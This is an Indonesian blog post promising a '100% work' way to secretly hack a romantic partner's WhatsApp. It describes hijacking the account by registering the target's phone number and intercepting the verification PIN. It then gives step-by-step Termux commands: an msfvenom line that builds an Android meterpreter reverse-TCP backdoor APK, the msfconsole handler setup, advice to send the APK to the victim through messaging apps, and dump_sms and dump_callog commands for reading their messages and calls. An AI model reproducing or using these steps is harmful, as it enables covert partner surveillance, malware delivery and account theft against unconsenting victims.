Cara Hack WA WhatsApp Pacar dengan aplikasi Termux 100% Work

Cara Hack WhatsApp Pacar | WhatsApp atau yang ebih kita kenal dengan WA merupakan sebuah aplikasi media sosial yang sangat populer dan bahkan bisa dibilang menjadi pesaing terberat dari medsos lainnya seperti facebook serta instagram. Di dalam aplikasi ini anda bisa melakukan komunikasi dengan cara chat seperti mengirim gambar, video bahkan bisa juga melakukan panggilan. Pernah terbesik tidak, bagi anda yang sekarang punya pacar dan ingin tahu kebiasan dia kalau sedang pakai WA tanpa harus ketahuan oleh si dia. Maka dari itu anda mencari cara Hack akun Wanya, ini dia ada salah satu aplikasi yang bisa membantu anda.
Ada cara sederhana yang bisa anda lakukan untuk bisa melihat aktifitas pasangan anda saat berselancar menggunakan WhatsApp tanpa harus menyentuh HP pacar anda. Dengan menggunakan aplikasi Termux, yang merupakan sebuah aplikas open source. Bagi anda para pengguna android, untuk bisa menjalankan aplikasi ini dibutuhkan android dengan 32 dan 64 bit dengan menimal OS android Lolipop 5.0. Bisa juga dengan akses root maupun tanpa root. Aplikasi ini ptergolong aman, untuk digunakan.
Dan saran dari saya, gunakan aplikasi ini untuk hal yang positif supaya hasilnya juga baik untuk anda. Jika anda menggunakan untuk hal yang tidak baik dan parahnya lagi pacar anda tau kalau akun Wanya sudah di hack oleh anda, maka akibatnya kepercayaan dari si doi akan mulai memudar seiring dengan berjalannya waktu. Jadi, alangkah baiknya untuk berfikir terlebih dahulu. Apa yakin anda akan melakukan hal ini, karena dampak yang akan diterima. Bisa jadi anda akan kehilangan dia. 
Disebuah hubungan, pasangan kita terkadang perlu yang namanya sebuah hiburan atau candaan dengan teman yang sudah lama dia kenal. Suatu kecemburuan bisa muncul karena hal seperti itu, setelah itu rasa curiga mulai menghampiri saat kita tau bahwa temannya tersebut berlawanan jenis.
Jika anda sudah mantap, tanpa harus befikir panjang lagi. Silahkan untuk mengikuti cara Hack WA orang terdekat, bahkan oleh orang lain dengan mudah tanpa ketahuan. Hal pertama yang harus dilakukan, pastikan aplikasi WhatsApp di android anda sudah terupdate paling baru. Agar bisa berkerja secara baik, perlu diingat jangan dipaksa untuk menggunakan versi lama, karena kegagalan adalah akibatnya.
Disini kami memberikan dua tips atau cara, bisa menggunakan aplikasi dan juga bisa tanpa aplikasi. Tinggal anda pilih mana yang akan anda coba terlebih dahulu.

Cara Hack WhatsApp pacar Tanpa Aplikasi

  1. Pertama pastikan aplikasi WA anda update ke versi terbaru
  2. Setelah itu siapkan Email atau nomer Hp target
  3. Selanjutnya anda bisa langsung masukk ke whatsapp dengan menggunakan nomer HP tersebut
  4. Lakukan sistem Set Up
  5. Disaat WA melakukan panggilan, silahkan angkat telepon
  6. PIN juga akan dikirim ke nomer tujuan
  7. Dan selamat anda berhasil menyadap nomor WA Pacar

Cara Hack WhatsApp pacar dengan aplikasi Termux:

  1. Pertama, silankan anda download terlebih dahulu aplikasi termux menggunakan via google playstore.
  2. Setelah itu, lalu buka dan kemudian ketik ifconfig untuk bisa melihat alamat IP anda sendiri.
  3. Langkah berikutnya, anda ketikan msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk (LHOST ganti dengan alamat ip anda).
  4. Saat file backdoor sudah jadi, anda bisa cek atau mencarinya dalam FILE >HOME >hack.apk
  5. Selanjutnya silahkan anda buka lagi aplikasi termux dan ketikan perintah dibawah ini dan pastikan datanya sama seperti file backdoor.
          msfconsole
          use exploit/multi/handler
          set payload android/meterpreter/reverse_tcp
          set lhost 192.168.43.166
          set lport 4444
          exploit

     6. Selanjutnya silahkan mengirim file hack.apk atau backdoor tersebut pada ponsel terget hack,               bisa menggunakan via wa, instagram, Messenger FB atau yang lainnya.
     7. Saat target berhasil menginstall apk tersebut, maka anda bisa lihat meterpreternya.
     8. Lalu ketik dump_sms untuk melihat riwayat pesan
     9. Ketik dump_callog untuk bisa melihat histori panggilan
   10. Dan selesai dan anda sudah bisa berhasil melakukan penyadapan WA pacar anda sendiri.

Itulah cara hack wa dan sudah terbukti berhasil dan work, dan bagi kalian yang masih bingung. Bisa search di google belajar termux untuk pemula, sudah banyak situs yang membahasnya. selamat mencoba.
Leave a Reply
You May Also Like

Tips dan Trik mengerjakan ujian PPPK 2021

Berikut tips dan trik mengerjakan ujian PPPK 2021 : 1. Pada soal…

Alternatif Aplikasi Perekam Layar untuk Membuat Video Pembelajaran

Sesudah timbulnya wabah Covid- 19 di belahan bumi, sistem pembelajaran juga mulai…

Wasiat Abah Guru Sekumpul Tentang Anak

1. JANGAN SERING DIBUAT MENANGIS. Karena kalau anak itu sering menangis atau…

13 Ide Mengemas Kado Kecantikan dalam Toples

Tampilah lebih cantik dengan kado kecantikan dalam toples ini. Every girls love these…